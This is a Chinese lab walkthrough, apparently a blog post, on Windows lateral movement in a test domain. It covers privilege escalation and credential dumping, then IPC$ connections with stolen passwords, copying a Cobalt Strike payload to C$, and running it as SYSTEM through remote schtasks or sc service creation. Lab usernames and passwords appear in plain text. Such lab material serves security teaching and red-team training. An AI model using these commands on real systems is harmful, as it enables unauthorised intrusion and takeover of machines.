内网渗透-横向移动-IPC配合计划任务(schtasks)和系统服务横向移动(sc)

IPC配合计划任务横向移动

IPC$介绍

IPC( Internet ProcessConnection)共享"命名管道"的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算 机的共享资源时使用。

通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列 表等信息。

首先,需要建立一个ipc$

net use \\192.168.41.30\ipc$ "密码" /user:administrator

net use

IPC$利用条件

1、开启了139、445端口

ipcs可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应 用。通过139、445( Windows2000)端口,可以实现对共享文件打印机的访问。因此,一般来讲,ipcs需要139、445端口的支持。

2、管理员开启了默认共享默认共享

是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(c、d、e等和系统目录winnt或 windows( adminS)通过ipc,可以实现对这些默认共享目录的访问

IPC$连接失败原因

用户名或密码错误

目标没有打开ipcs默认共享

不能成功连接目标的139、445端口

IPC$连接常见错误

错误号5:拒绝访问

错误号51: Windows无法找到网络路径,即网络中存在问题。

错误号53:找不到网络路径,包括IP地址错误、目标未开机、目标的 lanmanserver服务未 启动目标有防火墙(端口过滤)

错误号67:找不到网络名,包括 lanmanworkstation服务未启动、ipcs已被删除

错误号1219:提供的凭据与已存在的凭据集冲突。例如,已经和目标建立了ipcs,需要在删除原连接后重新进行连接。

错误号1326:未知的用户名或错误的密码

错误号l792;试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连 接域控制器时会出现此情况)。

错误号2242:此用户的密码已经过期°例如'目标机器设置了账号管理策略,强制用户定 期修改密码°

实验步骤

实验环境:

|-----------------|---------------|---------|--------|
| Ip | 用户 | 密码 | 权限 |
| 192.168.113.153 | Jack | qax@123 | 域内普通用户 |
| 192.168.113.154 | krbuser | qax@123 | 域管理员 |
| 192.168.113.152 | Administrator | qax@123 | 域控 |

现在只打下来了用户jack,目标:让jack用户横向到krbuser用户

三个机器防火墙正常开启

1.已经打下jack用户:

2.尝试抓取明文密码

失败了

失败的原因是因为,在执行这个命令时,必须需要是这个用户的管理员权限,就像这个:

所以我们需要特权去绕过

3.提权并榨取明文密码

我试了很多,也耽搁了很长时间,但是在win10里面,就只有uac-token-duplication

能用:

后面抓取明文密码为"qax@123"

4.尝试读取192.168.113.154(krbuser)文件

net share

本机的文件共享是打开的

shell dir \\192.168.113.154\C$

失败

5.建立连接,访问成功

shell net use \\192.168.113.154\ipc$ "qax@123" /user:test\krbuser

shell net use

6.让krbuser上线到CS4.8

查看进程

shell tasklist /s 192.168.113.154

可以查看防火墙等情况

查看时间

net time \\192.168.113.154

7.将123.exe复制到krbuser

copy 文件 \\IP地址\C$

copy 123.exe \\192.168.113.154\C$

8. 创建计划任务,执行123.exe

schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /f

shell schtasks /create /u krbuser /p qax@123 /s 192.168.113.154 /tn 123 /sc onstart /tr c:\123.exe /ru system /f

schtasks /run /s IP地址 /i /tn "计划任务名"

schtasks /run /s 192.168.113.154 /i /tn "123"

这里失败了,我们换一个方式

成功上线

IPC配合系统服务横向移动

获取到密码并着手横向时,却发现Task Sheduler服务没有启用。这时候我们就可以远程建立服务,然后再启用服务来运行我们想要运行的命令。

使用sc横向具体步骤

创建服务

sc \\192.168.113.154 create test binpath= "cmd.exe /c c:\123.exe"

开启服务

sc \\192.168.113.154 start test

一下就成功了

删除服务

sc \\192.168.17.138 delete test

但是这个很明显:

都可以很明显的发现异常,隐藏方法在后面权限维持会讲

sc的其他命令:

描述:SC 是用来与服务控制管理器和服务进行通信的命令行程序。

用法:sc <server> command service name <option1> <option2>...

<server> 选项的格式为 "\\ServerName"可通过键入以下命令获取有关命令的更多帮助: "sc

command"

命令:

query-----------查询服务的状态,或枚举服务类型的状态。

queryex---------查询服务的扩展状态,或枚举服务类型的状态。

start-----------启动服务。

pause-----------向服务发送 PAUSE 控制请求。

interrogate-----向服务发送 INTERROGATE 控制请求。

continue--------向服务发送 CONTINUE 控制请求。

stop------------向服务发送 STOP 请求。

config----------更改服务的配置(永久)。

description-----更改服务的描述。

failure---------更改失败时服务执行的操作。

failureflag-----更改服务的失败操作标志。

sidtype---------更改服务的服务 SID 类型。

privs-----------更改服务的所需特权。

managedaccount--更改服务以将服务帐户密码标记为由 LSA 管理。

qc--------------查询服务的配置信息。

qdescription----查询服务的描述。

qfailure--------查询失败时服务执行的操作。

qfailureflag----查询服务的失败操作标志。

qsidtype--------查询服务的服务 SID 类型。

qprivs----------查询服务的所需特权。

qtriggerinfo----查询服务的触发器参数。

qpreferrednode--查询服务的首选 NUMA 节点。

qmanagedaccount-查询服务是否将帐户与 LSA 管理的密码结合使用。

qprotection-----查询服务的进程保护级别。

quserservice----查询用户服务模板的本地实例。

delete ----------(从注册表中)删除服务。

create----------创建服务(并将其添加到注册表中)。

control---------向服务发送控制。

sdshow----------显示服务的安全描述符。

sdset-----------设置服务的安全描述符。

showsid---------显示与任意名称对应的服务 SID 字符串。

triggerinfo-----配置服务的触发器参数。

preferrednode---设置服务的首选 NUMA 节点。

GetDisplayName--获取服务的 DisplayName。

GetKeyName------获取服务的 ServiceKeyName。

EnumDepend------枚举服务依赖关系。

相关推荐
treesforest16 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安17 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
上海云盾第一敬业销售17 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手17 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub17 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61117 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux17 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc17 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing17 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵17 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全